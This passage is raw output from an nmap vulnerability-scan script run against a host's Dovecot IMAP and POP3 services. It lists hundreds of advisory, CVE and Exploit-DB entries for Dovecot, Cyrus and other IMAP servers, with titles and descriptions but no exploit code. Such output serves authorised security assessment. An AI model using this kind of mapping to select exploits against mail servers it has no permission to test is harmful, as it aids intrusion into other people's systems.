13056| SecurityFocus - https://www.securityfocus.com/bid/:
13057| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
13058| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
13059| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
13060| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
13061| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
13062| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
13063| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
13064| [67306] Dovecot Denial of Service Vulnerability
13065| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
13066| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
13067| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
13068| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
13069| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
13070| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
13071| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
13072| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
13073| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
13074| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
13075| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
13076| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
13077| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
13078| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
13079| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
13080| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
13081| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
13082| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
13083| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
13084| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
13085| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
13086| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
13087| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
13088| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
13089| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
13090| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
13091| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
13092| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
13093| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
13094| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
13095| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
13096| [17961] Dovecot Remote Information Disclosure Vulnerability
13097| [16672] Dovecot Double Free Denial of Service Vulnerability
13098| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
13099| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
13100| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
13101| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
13102| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
13103| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
13104| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
13105| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
13106| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
13107| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
13108| [130] imapd Buffer Overflow Vulnerability
13109|
13110| IBM X-Force - https://exchange.xforce.ibmcloud.com:
13111| [86382] Dovecot POP3 Service denial of service
13112| [84396] Dovecot IMAP APPEND denial of service
13113| [80453] Dovecot mail-search.c denial of service
13114| [71354] Dovecot SSL Common Name (CN) weak security
13115| [70325] Cyrus IMAPd NNTP security bypass
13116| [67675] Dovecot script-login security bypass
13117| [67674] Dovecot script-login directory traversal
13118| [67589] Dovecot header name denial of service
13119| [63267] Apple Mac OS X Dovecot information disclosure
13120| [62340] Dovecot mailbox security bypass
13121| [62339] Dovecot IMAP or POP3 denial of service
13122| [62256] Dovecot mailbox security bypass
13123| [62255] Dovecot ACL entry security bypass
13124| [60639] Dovecot ACL plugin weak security
13125| [57267] Apple Mac OS X Dovecot Kerberos security bypass
13126| [56763] Dovecot header denial of service
13127| [54363] Dovecot base_dir privilege escalation
13128| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
13129| [47526] UW-imapd rfc822_output_char() denial of service
13130| [46323] Dovecot dovecot.conf information disclosure
13131| [46227] Dovecot message parsing denial of service
13132| [45669] Dovecot ACL mailbox security bypass
13133| [45667] Dovecot ACL plugin rights security bypass
13134| [41085] Dovecot TAB characters authentication bypass
13135| [41009] Dovecot mail_extra_groups option unauthorized access
13136| [39342] Dovecot LDAP auth cache configuration security bypass
13137| [35767] Dovecot ACL plugin security bypass
13138| [34082] Dovecot mbox-storage.c directory traversal
13139| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
13140| [26536] Dovecot IMAP LIST information disclosure
13141| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
13142| [24709] Dovecot APPEND command denial of service
13143| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
13144| [19460] Cyrus IMAP imapd buffer overflow
13145| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
13146| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
13147| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
13148| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
13149| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
13150| [7345] Slackware Linux imapd and ipop3d core dump
13151| [573] Imapd denial of service
13152|
13153| Exploit-DB - https://www.exploit-db.com:
13154| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
13155| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
13156| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
13157| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
13158| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
13159| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
13160| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
13161| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
13162| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
13163| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
13164| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
13165| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
13166| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
13167| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
13168| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
13169| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
13170| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
13171| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
13172| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
13173| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
13174| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
13175| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
13176| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
13177| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
13178| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
13179| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
13180| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
13181| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
13182| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
13183| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
13184| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
13185| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
13186| [340] Linux imapd Remote Overflow File Retrieve Exploit
13187|
13188| OpenVAS (Nessus) - http://www.openvas.org:
13189| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
13190| [901025] Dovecot Version Detection
13191| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
13192| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
13193| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
13194| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
13195| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
13196| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
13197| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
13198| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
13199| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
13200| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
13201| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
13202| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
13203| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
13204| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
13205| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
13206| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
13207| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
13208| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
13209| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
13210| [870607] RedHat Update for dovecot RHSA-2011:0600-01
13211| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
13212| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
13213| [870471] RedHat Update for dovecot RHSA-2011:1187-01
13214| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
13215| [870153] RedHat Update for dovecot RHSA-2008:0297-02
13216| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
13217| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
13218| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
13219| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
13220| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
13221| [863272] Fedora Update for dovecot FEDORA-2011-7612
13222| [863115] Fedora Update for dovecot FEDORA-2011-7258
13223| [861525] Fedora Update for dovecot FEDORA-2007-664
13224| [861394] Fedora Update for dovecot FEDORA-2007-493
13225| [861333] Fedora Update for dovecot FEDORA-2007-1485
13226| [860845] Fedora Update for dovecot FEDORA-2008-9202
13227| [860663] Fedora Update for dovecot FEDORA-2008-2475
13228| [860169] Fedora Update for dovecot FEDORA-2008-2464
13229| [860089] Fedora Update for dovecot FEDORA-2008-9232
13230| [840950] Ubuntu Update for dovecot USN-1295-1
13231| [840668] Ubuntu Update for dovecot USN-1143-1
13232| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
13233| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
13234| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
13235| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
13236| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
13237| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
13238| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
13239| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
13240| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
13241| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
13242| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
13243| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
13244| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
13245| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
13246| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
13247| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
13248| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
13249| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
13250| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
13251| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
13252| [70259] FreeBSD Ports: dovecot
13253| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
13254| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
13255| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
13256| [66522] FreeBSD Ports: dovecot
13257| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
13258| [66233] SLES10: Security update for Cyrus IMAPD
13259| [66226] SLES11: Security update for Cyrus IMAPD
13260| [66222] SLES9: Security update for Cyrus IMAPD
13261| [65938] SLES10: Security update for Cyrus IMAPD
13262| [65723] SLES11: Security update for Cyrus IMAPD
13263| [65523] SLES9: Security update for Cyrus IMAPD
13264| [65479] SLES9: Security update for cyrus-imapd
13265| [65094] SLES9: Security update for cyrus-imapd
13266| [65010] Ubuntu USN-838-1 (dovecot)
13267| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
13268| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
13269| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
13270| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
13271| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
13272| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
13273| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
13274| [64898] FreeBSD Ports: cyrus-imapd
13275| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
13276| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
13277| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
13278| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
13279| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
13280| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
13281| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
13282| [62854] FreeBSD Ports: dovecot-managesieve
13283| [61916] FreeBSD Ports: dovecot
13284| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
13285| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
13286| [60528] FreeBSD Ports: dovecot
13287| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
13288| [60089] FreeBSD Ports: dovecot
13289| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
13290| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
13291| [55807] Slackware Advisory SSA:2005-310-06 imapd
13292| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
13293| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
13294| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
13295| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
13296| [52297] FreeBSD Ports: cyrus-imapd
13297| [52296] FreeBSD Ports: cyrus-imapd
13298| [52295] FreeBSD Ports: cyrus-imapd
13299| [52294] FreeBSD Ports: cyrus-imapd
13300| [52172] FreeBSD Ports: cyrus-imapd
13301|
13302| SecurityTracker - https://www.securitytracker.com:
13303| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
13304| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
13305| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
13306| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
13307|
13308| OSVDB - http://www.osvdb.org:
13309| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
13310| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
13311| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
13312| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
13313| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
13314| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
13315| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
13316| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
13317| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
13318| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
13319| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
13320| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
13321| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
13322| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
13323| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
13324| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
13325| [66113] Dovecot Mail Root Directory Creation Permission Weakness
13326| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
13327| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
13328| [66110] Dovecot Multiple Unspecified Buffer Overflows
13329| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
13330| [64783] Dovecot E-mail Message Header Unspecified DoS
13331| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
13332| [62796] Dovecot mbox Format Email Header Handling DoS
13333| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
13334| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
13335| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
13336| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
13337| [52906] UW-imapd c-client Initial Request Remote Format String
13338| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
13339| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
13340| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
13341| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
13342| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
13343| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
13344| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
13345| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
13346| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
13347| [43137] Dovecot mail_extra_groups Symlink File Manipulation
13348| [42979] Dovecot passdbs Argument Injection Authentication Bypass
13349| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
13350| [39876] Dovecot LDAP Auth Cache Security Bypass
13351| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
13352| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
13353| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
13354| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
13355| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
13356| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
13357| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
13358| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
13359| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
13360| [23281] Dovecot imap/pop3-login dovecot-auth DoS
13361| [23280] Dovecot Malformed APPEND Command DoS
13362| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
13363| [13242] UW-imapd CRAM-MD5 Authentication Bypass
13364| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
13365| [12042] UoW imapd Multiple Unspecified Overflows
13366| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
13367| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
13368| [911] UoW imapd AUTHENTICATE Command Remote Overflow
13369| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
13370| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
13371|_
13372995/tcp open ssl/pop3 Dovecot pop3d
13373| vulscan: VulDB - https://vuldb.com:
13374| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
13375| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
13376| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
13377| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
13378| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
13379| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
13380| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
13381| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
13382| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
13383| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
13384| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
13385| [69835] Dovecot 2.2.0/2.2.1 denial of service
13386| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
13387| [65684] Dovecot up to 2.2.6 unknown vulnerability
13388| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
13389| [63692] Dovecot up to 2.0.15 spoofing
13390| [7062] Dovecot 2.1.10 mail-search.c denial of service
13391| [57517] Dovecot up to 2.0.12 Login directory traversal
13392| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
13393| [57515] Dovecot up to 2.0.12 Crash denial of service
13394| [54944] Dovecot up to 1.2.14 denial of service
13395| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
13396| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
13397| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
13398| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
13399| [53277] Dovecot up to 1.2.10 denial of service
13400| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
13401| [45256] Dovecot up to 1.1.5 directory traversal
13402| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
13403| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
13404| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
13405| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
13406| [40356] Dovecot 1.0.9 Cache unknown vulnerability
13407| [38222] Dovecot 1.0.2 directory traversal
13408| [36376] Dovecot up to 1.0.x directory traversal
13409| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
13410|
13411| MITRE CVE - https://cve.mitre.org:
13412| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
13413| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
13414| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
13415| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
13416| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
13417| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
13418| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
13419| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
13420| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
13421| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
13422| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
13423| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
13424| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
13425| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
13426| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
13427| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
13428| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
13429| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
13430| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
13431| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
13432| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
